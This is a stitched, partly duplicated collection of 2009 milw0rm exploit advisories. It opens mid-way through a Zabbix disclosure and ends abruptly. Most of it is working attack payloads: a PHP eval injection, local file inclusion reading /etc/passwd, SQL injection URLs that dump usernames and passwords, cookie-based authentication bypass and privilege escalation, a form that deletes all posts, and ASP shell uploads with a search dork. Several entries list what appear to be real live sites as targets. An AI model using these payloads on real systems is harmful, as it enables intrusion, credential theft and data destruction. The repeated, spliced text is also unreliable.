PAGE_SIZE."==0)", NULL),
"next"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
"prev"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
// filter
"filter_rst"=> array(T_ZBX_INT, O_OPT, P_SYS, IN(array(0,1)), NULL),
"filter_set"=> array(T_ZBX_STR, O_OPT, P_SYS, null, NULL),
"userid"=> array(T_ZBX_INT, O_OPT, P_SYS, DB_ID, NULL),
'filter_timesince'=> array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
'filter_timetill'=> array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
//ajax
'favobj'=> array(T_ZBX_STR, O_OPT, P_ACT, NULL, NULL),
'favid'=> array(T_ZBX_STR, O_OPT, P_ACT, NOT_EMPTY,
'isset({favobj})'),
'state'=> array(T_ZBX_INT, O_OPT, P_ACT, NOT_EMPTY,
'isset({favobj}) && ("filter"=={favobj})'),
);
check_fields($fields);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
After the definition of the "$fields" array all the variables are
checked by the function check_fields().
The main step of the check_fields() function is:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
foreach($fields as $field => $checks){
$err |= check_field($fields, $field, $checks);
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
Following the check_field() function we have identified that the
function's main steps are the creation of some local variables using
list() and a consequent call of calc_exp() (which resides in the same
file).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
list($type, $opt, $flags, $validation, $exception) = $checks;
[...]
$except=calc_exp($fields,$field,$exception);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
calc_exp()'s code is:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function calc_exp($fields,$field,$expression){
if(zbx_strstr($expression,"{}") && !isset($_REQUEST[$field]))
return FALSE;
if(zbx_strstr($expression,"{}") && !is_array($_REQUEST[$field]))
$expression = str_replace("{}",'$_REQUEST["'.$field.'"]',$expression);
if(zbx_strstr($expression,"{}") && is_array($_REQUEST[$field])){
foreach($_REQUEST[$field] as $key => $val){
$expression2 =
str_replace("{}",'$_REQUEST["'.$field.'"]["'.$key.'"]',$expression);
if(calc_exp2($fields,$field,$expression2)==FALSE)
return FALSE;
}
return TRUE;
}
return calc_exp2($fields,$field,$expression);
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
As you can see we should be able to call calc_exp2(), our vulnerable
function, avoiding to fall into a breach that exits (returns) from the
function.
Investigating calc_exp2()'s source:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function calc_exp2($fields,$field,$expression){
foreach($fields as $f => $checks){
$expression = str_replace('{'.$f.'}','$_REQUEST["'.$f.'"]',$expression);
}
$expression = trim($expression,"& ");
$exec = "return (".$expression.") ? 1 : 0;";
$ret = eval($exec);
return $ret;
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
We have reached a function that contains an eval() call of the "$exec"
variable that contains user controlled data.
To better understand how the executed string is composed we must find
a disposable page. Thanks to "locales.php" we can reach this function
without any authentication.
Now if we try to execute the query:
/locales.php?download&langTo&extlang[AAA]=1
The value of $exec is the following:
return (($_REQUEST["extlang"]["AAA"]!='')) ? 1 : 0;
Some constraints exist: the injected payload must comply with the
calc_exp()'s requirements in order to call calc_exp2() and the created
string must be syntactically correct. What we can do is to play with
the key values of the array. An intermediate test was:
/locales.php?download&langTo&extlang[AAA"];phpinfo();]=1
But it generates a syntax error. After some thinking the problem was
solved in this way:
/locales.php?download&langTo&extlang[".phpinfo()."]=1
Now the syntax is correct and the payload gets executed.
B) Cross Site Request Forgery
A CSRF vulnerability exists in file "users.php". If the admin visits the
following link:
/users.php?config=0&save&alias=alias&name=foo&surname=foo&user_type=3&
lang=lang&theme=theme&autologout=0&url=url&refresh=0
A user with admin permissions is created.
C) Local File Inclusion
If the user is authenticated, a Local File Inclusion vulnerability
exists in file "locales.php".
The following URL exploits this vulnerability:
/locales.php?action=1&next=1&srclang=../validate&extlang=en
A string in the form of ".inc.php" is automatically appended to the
local file path. Despite that it's possible to include every target
file truncating the filename using (nullbyte):
/locales.php?next=1&srclang=../../../../../../../var/log/apache2/error_log%22
Nullbyte injection normally requires magic quotes off.
The vulnerable code is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
'srclang'=> array(T_ZBX_STR, O_OPT, NULL, NOT_EMPTY, 'isset({next})'),
[...]
else if(isset($_REQUEST['next'])){
[...]
$fileFrom = 'include/locales/'.$_REQUEST['srclang'].".inc.php";
if(file_exists($fileFrom)){
include($fileFrom);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
IV. DETECTION
Zabbix 1.6.2 and possibly earlier versions are vulnerable.
V. WORKAROUND
Update zabbix from svn the server (svn://svn.zabbix.com) or download
version 1.6.3 when aviable.
VI. VENDOR RESPONSE
Vendor will fix all the exposed vulnerabilities in Zabbix 1.6.3.
VII. CVE INFORMATION
No CVE at this time.
VIII. DISCLOSURE TIMELINE
20081215 Bug discovered
20090116 Initial vendor contact
20090116 Vendor Response (Fixes will be included in Zabbix 1.6.3)
20090130 Second email (When this is going to be fixed?)
20090131 Vendor Response (Everything has been fixed a week ago and is
publicy aviable in the SVN, Zabbix 1.6.3 will be released
within 10-15 days)
20090220 Third email (20 days elasped and no response, we will release
on 23 Feb)
20090220 Vendor Response (Postpone of 5-10 days required)
20090220 Third email (We will wait 5-10 days, 2 March is the deadline
if no contact)
20090303 Forced Advisory Release
IX. CREDIT
Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni
"evilaliv3" Pellerano are credited with the discovery of this
vulnerability.
Antonio "s4tan" Parata
web site: http://www.ictsc.it/
mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it
Giovanni "evilaliv3" Pellerano
web site: http://www.evilaliv3.org
mail: giovanni.pellerano AT evilaliv3 DOT org
X. LEGAL NOTICES
Copyright (c) 2009 Francesco "ascii" Ongaro
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
# milw0rm
Joomla/Mambo Component eXtplorer Code Execution Vulnerability
INTERNET SECURITY AUDITORS ALERT 2009-002
- Original release date: January 7th, 2009
- Last revised: March 2nd, 2009
- Discovered by: Juan Galiana Lara
- Severity: 9/10 (CVSS scored)
I. VULNERABILITY
eXtplorer standalone & Joomla!/Mambo Remote Code Execution vulnerability
II. BACKGROUND
eXtplorer is a web-based File Management Component for all your needs.
It has a desktop-application-like interface with drag&drop, grid and a
directory tree and makes heavy use of the ExtJS Javascript Library.
It's widely used to access and modify the files and directories on
your server via FTP or direct file access.
It runs natively under Joomla! 1.5.x, 1.0.x, Mambo component and can
also be used as a standalone app. Is based on Quixplorer (available at
http://sourceforge.net/projects/quixplorer/). eXtplorer is released
under a dual-license: the Mozilla Public License (MPL 1.1) and the GNU
General Public License (GNU/GPL).
III. DESCRIPTION
eXtplorer is prone to a local file include and directory traversal
vulnerability because the application fails to sufficiently sanitize
user-supplied input. The parameter 'lang' is not properly sanitized.
Since the application allows to upload files to the server could be
combined with previous vulnerabilities to allow an attacker to view
any local file or execute arbitrary code remotely in the context of
the webserver. This may aid in launching further attacks.
In order to perform the attack, an attacker could upload a PHP
maliciuos code (upload action is allowed by the application), then
exploit a bug to know the full path to the local file recently
uploaded (if 'display_errors' directive is set to On) and then include
it exploiting the local file include and directory traversal flaw
(using ../../path/to/file) to finally execute the php code.
Successfully explotation of this flaw may aid in the compromise of the
server in the context of the webserver.
The software is affected running standalone or as a Joomla!/Mambo
component.
IV. PROOF OF CONCEPT
The affected code:
File: include/init.php Line 100
$GLOBALS["language"] = $mainframe->getUserStateFromRequest(
'language', 'lang', $default_lang );
File: include/init.php Line: 145
// Necessary files
require_once( _EXT_PATH."/config/conf.php" );
if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"].".php")) {
require_once(
_EXT_PATH."/languages/".$GLOBALS["language"].".php" ); <- HERE } else { require_once( _EXT_PATH."/languages/english.php" ); } if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php")) { require_once( _EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php" ); <- HERE } else { require_once( _EXT_PATH."/languages/english_mimes.php" ); } the file include/init.php is included in all the request to the application. Here is a poc: PoC: http://site/path/?lang=../../path/to/maliciuos_uploaded_code PoC: http://site/path/?lang=../../../../../etc/passwd The bug can be exploited with or without 'magic_quotes_gpc', but note that if magic_quotes_gpc is set to Off, an attacker can view any file, adding a '\0' character like /etc/passwd, if not only can include php files, allowing to execute any php code he want. Is also possible to hide the crafted parameters data including it thougth POST method, making detection more difficult to site administrator. In order to successfully perform this attack the attacker must have the full path where the files are uploaded, and it is easy to get making a request like this: POST /path/index.php HTTP/1.1 Host: host User-Agent: user-agent Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://host/path Content-Length: 80 Cookie: PHPSESSID=; eXtplorer=
Pragma: no-cache
Cache-Control: no-cache
start=0&limit=50&dir=x&option=com_extplorer&action=getdircontents&sendWhat=files
The response is a JSON file:
{"action":"","message":"\/var\/www\/path\/\/x : This directory
doesn\\'t exist.","error":"\/var\/www\/path\/\/x : This directory
doesn\\'t exist.","success":false}
Sending "x", the application came back "/var/www/path/x".
V. BUSINESS IMPACT
An attacker could execute arbitrary code remotely and maybe gain
access to the operating system of the server.
VI. SYSTEMS AFFECTED
Versions prior to 2.0.0 of eXtplorer are vulnerable.
VII. SOLUTION
Upgrade to version 2.0.1 of eXtplorer. It can be downloaded from
http://extplorer.sourceforge.net
VIII. REFERENCES
http://extplorer.sf.net
IX. CREDITS
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
March 02, 2009: Initial release
XI. DISCLOSURE TIMELINE
January 07, 2009: eXtplorer contacted
January 15, 2009: eXtplorer release version 2.0.1
March 02, 2009: Vulnerability published
XII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
# milw0rm
- Original release date: January 7th, 2009
- Last revised: March 2nd, 2009
- Discovered by: Juan Galiana Lara
- Severity: 9/10 (CVSS scored)
I. VULNERABILITY
eXtplorer standalone & Joomla!/Mambo Remote Code Execution vulnerability
II. BACKGROUND
eXtplorer is a web-based File Management Component for all your needs.
It has a desktop-application-like interface with drag&drop, grid and a
directory tree and makes heavy use of the ExtJS Javascript Library.
It's widely used to access and modify the files and directories on
your server via FTP or direct file access.
It runs natively under Joomla! 1.5.x, 1.0.x, Mambo component and can
also be used as a standalone app. Is based on Quixplorer (available at
http://sourceforge.net/projects/quixplorer/). eXtplorer is released
under a dual-license: the Mozilla Public License (MPL 1.1) and the GNU
General Public License (GNU/GPL).
III. DESCRIPTION
eXtplorer is prone to a local file include and directory traversal
vulnerability because the application fails to sufficiently sanitize
user-supplied input. The parameter 'lang' is not properly sanitized.
Since the application allows to upload files to the server could be
combined with previous vulnerabilities to allow an attacker to view
any local file or execute arbitrary code remotely in the context of
the webserver. This may aid in launching further attacks.
In order to perform the attack, an attacker could upload a PHP
maliciuos code (upload action is allowed by the application), then
exploit a bug to know the full path to the local file recently
uploaded (if 'display_errors' directive is set to On) and then include
it exploiting the local file include and directory traversal flaw
(using ../../path/to/file) to finally execute the php code.
Successfully explotation of this flaw may aid in the compromise of the
server in the context of the webserver.
The software is affected running standalone or as a Joomla!/Mambo
component.
IV. PROOF OF CONCEPT
The affected code:
File: include/init.php Line 100
$GLOBALS["language"] = $mainframe->getUserStateFromRequest(
'language', 'lang', $default_lang );
File: include/init.php Line: 145
// Necessary files
require_once( _EXT_PATH."/config/conf.php" );
if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"].".php")) {
require_once(
_EXT_PATH."/languages/".$GLOBALS["language"].".php" ); <- HERE } else { require_once( _EXT_PATH."/languages/english.php" ); } if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php")) { require_once( _EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php" ); <- HERE } else { require_once( _EXT_PATH."/languages/english_mimes.php" ); } the file include/init.php is included in all the request to the application. Here is a poc: PoC: http://site/path/?lang=../../path/to/maliciuos_uploaded_code PoC: http://site/path/?lang=../../../../../etc/passwd The bug can be exploited with or without 'magic_quotes_gpc', but note that if magic_quotes_gpc is set to Off, an attacker can view any file, adding a '\0' character like /etc/passwd, if not only can include php files, allowing to execute any php code he want. Is also possible to hide the crafted parameters data including it thougth POST method, making detection more difficult to site administrator. In order to successfully perform this attack the attacker must have the full path where the files are uploaded, and it is easy to get making a request like this: POST /path/index.php HTTP/1.1 Host: host User-Agent: user-agent Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://host/path Content-Length: 80 Cookie: PHPSESSID=
Pragma: no-cache
Cache-Control: no-cache
start=0&limit=50&dir=x&option=com_extplorer&action=getdircontents&sendWhat=files
The response is a JSON file:
{"action":"","message":"\/var\/www\/path\/\/x : This directory
doesn\\'t exist.","error":"\/var\/www\/path\/\/x : This directory
doesn\\'t exist.","success":false}
Sending "x", the application came back "/var/www/path/x".
V. BUSINESS IMPACT
An attacker could execute arbitrary code remotely and maybe gain
access to the operating system of the server.
VI. SYSTEMS AFFECTED
Versions prior to 2.0.0 of eXtplorer are vulnerable.
VII. SOLUTION
Upgrade to version 2.0.1 of eXtplorer. It can be downloaded from
http://extplorer.sourceforge.net
VIII. REFERENCES
http://extplorer.sf.net
IX. CREDITS
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
March 02, 2009: Initial release
XI. DISCLOSURE TIMELINE
January 07, 2009: eXtplorer contacted
January 15, 2009: eXtplorer release version 2.0.1
March 02, 2009: Vulnerability published
XII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
# milw0rm
Graugon PHP Article Publisher 1.0 (SQL/CH) Multiple Remote Vulnerabilities
[0x01] Informations:
Name : Graugon PHP Article Publisher 1.0
Download : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability : Multiple Sql Injections / Insecure Cookie Handling
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
[0x02] Bug:
Bugged Page: index.php [..] admin.php [..] view.php
[Code]
$c = $_GET['c'];
$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
[/code]
[code]
$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);
[/code]
[code]
$id = $_GET['id']; [..]
$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
[/code]
[0x03] Exploits:
Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
http://victim.it/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
javascript:document.cookie ="g_admin=1; path=/"
# milw0rm
Name : Graugon PHP Article Publisher 1.0
Download : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability : Multiple Sql Injections / Insecure Cookie Handling
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
[0x02] Bug:
Bugged Page: index.php [..] admin.php [..] view.php
[Code]
$c = $_GET['c'];
$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
[/code]
[code]
$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);
[/code]
[code]
$id = $_GET['id']; [..]
$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
[/code]
[0x03] Exploits:
Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
http://victim.it/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
javascript:document.cookie ="g_admin=1; path=/"
# milw0rm
Access2asp imageLibrary Arbitrary ASP Shell Upload Vulnerability
[dork]
inurl:"default_Image.asp"
EXPLOITS:
http://www.site.com/imageLibrary//admin/images/default_Image.asp
[exp:]
http://www.davidhalpernmd.com/manage_tbps/default_Image.asp
[demo]
http://www.access2asp.com/imageLibraryDemo/admin/images/default_Image.asp
[shell be like ]
http://www.access2asp.com/imageLibraryDemo/admin/images/win.asp
Special Greetz for : www.sec-code.com
Greetz : MaTrEx & samkmk.almkkar & 3lo0osh & ili The General ili & Super-Code & BxH &all tryag members & all muslims
# milw0rm
inurl:"default_Image.asp"
EXPLOITS:
http://www.site.com/imageLibrary//admin/images/default_Image.asp
[exp:]
http://www.davidhalpernmd.com/manage_tbps/default_Image.asp
[demo]
http://www.access2asp.com/imageLibraryDemo/admin/images/default_Image.asp
[shell be like ]
http://www.access2asp.com/imageLibraryDemo/admin/images/win.asp
Special Greetz for : www.sec-code.com
Greetz : MaTrEx & samkmk.almkkar & 3lo0osh & ili The General ili & Super-Code & BxH &all tryag members & all muslims
# milw0rm
Digital Interchange Calendar 5.7.13 Contents Change Vulnerability
Author : ByALBAYX
Website : WWW.C4TEAM.ORG
Contry : Turkish
Script :Digital Interchange Calendar V. 5.7.13
S.Site :http://digitalinterchange.com
Dty :http://digitalinterchange.com/products/index.asp?iProductID=1
Price :$129.00
Vulnerabily:
http://c4team.org/ [PATH] /admin/registration_options.asp
http://c4team.org/ [PATH] /admin/add_registration_option.asp
http://c4team.org/ [PATH] /admin/set_registration_option_status.asp
Vs....
Demo:
http://calendar.digitalinterchange.com
http://eeba.org/calendar
http://mema.state.md.us/calendar
http://iamu.org/calendar
http://usgbcutah.org/calendar
# milw0rm
Website : WWW.C4TEAM.ORG
Contry : Turkish
Script :Digital Interchange Calendar V. 5.7.13
S.Site :http://digitalinterchange.com
Dty :http://digitalinterchange.com/products/index.asp?iProductID=1
Price :$129.00
Vulnerabily:
http://c4team.org/ [PATH] /admin/registration_options.asp
http://c4team.org/ [PATH] /admin/add_registration_option.asp
http://c4team.org/ [PATH] /admin/set_registration_option_status.asp
Vs....
Demo:
http://calendar.digitalinterchange.com
http://eeba.org/calendar
http://mema.state.md.us/calendar
http://iamu.org/calendar
http://usgbcutah.org/calendar
# milw0rm
Document Library 1.0.1 Arbitrary Change Admin Vulnerability
Author : ByALBAYX
Website : WWW.C4TEAM.ORG
Script :Document Library Version 1.0.1
S.Site :http://digitalinterchange.com
Dty :http://digitalinterchange.com/products/index.asp?iProductID=12
Demo :http://library.digitalinterchange.com
Price :$109.00
Vulnerability :
Update Admin Account Info
http://c4team.org/ [PATH] /admin/save_user.asp
Admin Username :Heykir
Admin Password :Heykir
Confirm Password :Heykir
Save
http://c4team.org/ [PATH] /admin/login.asp
Demo:
http://library.digitalinterchange.com/admin/save_user.asp
http://library.digitalinterchange.com/admin/login.asp
# milw0rm
Website : WWW.C4TEAM.ORG
Script :Document Library Version 1.0.1
S.Site :http://digitalinterchange.com
Dty :http://digitalinterchange.com/products/index.asp?iProductID=12
Demo :http://library.digitalinterchange.com
Price :$109.00
Vulnerability :
Update Admin Account Info
http://c4team.org/ [PATH] /admin/save_user.asp
Admin Username :Heykir
Admin Password :Heykir
Confirm Password :Heykir
Save
http://c4team.org/ [PATH] /admin/login.asp
Demo:
http://library.digitalinterchange.com/admin/save_user.asp
http://library.digitalinterchange.com/admin/login.asp
# milw0rm
EZ-Blog 1b Delete All Posts / SQL Injection Vulnerabilities
Application: EZ-Blog
http://sourceforge.net/projects/ez-blog/
Version: Beta 1
Bug: * Multiple SQL Injection
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
This is a crazy application because it not
require authentication for posting, deleting,
etc. and it is entirely vulnerable to SQL
Injection, as follows:
http://site/path/public/view.php?storyid=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10%23
There aren't hight reserved information on the
database, but it is possible to cause inconvenience.
The following injection allow to delete all
posts:
form action="http://site/path/admin/remove.php" method="POST"
input type="hidden" name="kill" value="1'or'1'='1"
input type="hidden" name="confirm" value="1"
input type="hidden" name="rm" value="true"
input type="submit" value="Exploit"
/form
# milw0rm
http://sourceforge.net/projects/ez-blog/
Version: Beta 1
Bug: * Multiple SQL Injection
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
This is a crazy application because it not
require authentication for posting, deleting,
etc. and it is entirely vulnerable to SQL
Injection, as follows:
http://site/path/public/view.php?storyid=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10%23
There aren't hight reserved information on the
database, but it is possible to cause inconvenience.
The following injection allow to delete all
posts:
form action="http://site/path/admin/remove.php" method="POST"
input type="hidden" name="kill" value="1'or'1'='1"
input type="hidden" name="confirm" value="1"
input type="hidden" name="rm" value="true"
input type="submit" value="Exploit"
/form
# milw0rm
BlogMan 0.45 Multiple Remote Vulnerabilities
Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com
*************************************************
- BUGS
This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.
#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
echo "
*/
Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
#[3] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: profile.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23
#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php
The following lines are improperly checked:
/*
$un = $_POST['un'];
$pw = $_POST['pw'];
...
$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserName='".$un."'"));
if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/
Using a SQL Injection bug it is possible to bypass
conditions and to set an arbitrary UserID value.
The following information must be sent using
POST method to doLogin.php
un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass
The First value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.
#[2] Authentication Bypass:
Requisites: none
File affected: all
It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid',
and inserting the value of a registered user id
into the content(sometimes 1 for admin):
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php
It is possible to escalate privileges using
a SQL Injection bug through a cookie.
The following lines are improperly checked:
/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
echo "meta equiv="'refresh'" content="'0;index.php'" /head /html";
} else {
...
}
*/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
The first value is UserID and the last value
is UserCanAdmin.
# milw0rm
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com
*************************************************
- BUGS
This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.
#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
echo "
*/
Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
#[3] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: profile.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23
#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php
The following lines are improperly checked:
/*
$un = $_POST['un'];
$pw = $_POST['pw'];
...
$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserName='".$un."'"));
if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/
Using a SQL Injection bug it is possible to bypass
conditions and to set an arbitrary UserID value.
The following information must be sent using
POST method to doLogin.php
un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass
The First value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.
#[2] Authentication Bypass:
Requisites: none
File affected: all
It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid',
and inserting the value of a registered user id
into the content(sometimes 1 for admin):
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php
It is possible to escalate privileges using
a SQL Injection bug through a cookie.
The following lines are improperly checked:
/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
echo "meta equiv="'refresh'" content="'0;index.php'" /head /html";
} else {
...
}
*/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
The first value is UserID and the last value
is UserCanAdmin.
# milw0rm
Easy File Sharing Web Server 4.8 File Disclosure Vulnerability
Easy File Sharing Web Server File Disclouse Vulnerability
Program: Easy File Sharing Web Server
Version: 4.8
Download: http://www.sharing-file.com/efssetup.exe
